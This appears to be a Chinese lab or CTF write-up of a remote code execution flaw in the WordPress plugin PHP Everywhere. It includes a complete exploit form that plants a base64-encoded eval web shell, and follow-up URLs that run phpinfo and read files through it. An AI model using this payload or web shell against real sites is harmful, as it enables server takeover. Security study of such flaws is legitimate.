产品简介#
WordPress 是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用 PHP 语言和 MySQL 数据库开发的,用户可以在支持 PHP 和 MySQL 数据库的服务器上使用自己的博客。
漏洞概述#
任何订阅者都可以利用该漏洞发送带有 “短代码” 参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。
影响范围#
<= 2.0.3
影响插件:PHP Everywhere
利用流程#
访问后台地址:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin
账号:test/test
删除仪表盘下方的内容,浏览器 F12,添加一个节点,输入如下内容:
<form
action="http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
method="post"
>
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/111.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute" />
</form>
然后执行即可(点击 execute),访问如下链接:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php
页面返回 200.
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=phpinfo();
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=system(%27tac%20/f*%27);
修复建议#
- 升级版本